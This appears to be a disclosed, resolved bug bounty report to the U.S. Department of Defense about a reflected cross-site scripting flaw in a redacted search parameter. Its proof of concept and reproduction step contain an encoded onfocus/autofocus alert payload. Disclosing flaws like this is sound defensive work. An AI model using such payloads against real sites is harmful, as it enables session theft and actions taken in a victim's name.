Reflected XSS at https://█████ via "██████████" parameter
Medium
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
pelegn
Vulnerability Details
Technical details and impact analysis
There is Reflected Cross site scripting issue at the following url:
https://█████
Proof Of Concept
https://████████?█████=%22onfocus%3d%22alert(document.domain)%22autofocus%3d%22&█████████████████████=Search
████
Best Regards
@pelegn
## Impact
Cookies Exfiltration
SOAP Bypass
CORS Bypass
Executing javascript on the victim behalf
## System Host(s)
████████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Navigate to https://████?███████=%22onfocus%3d%22alert(document.domain)%22autofocus%3d%22&█████████████████=Search
## Suggested Mitigation/Remediation Actions
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected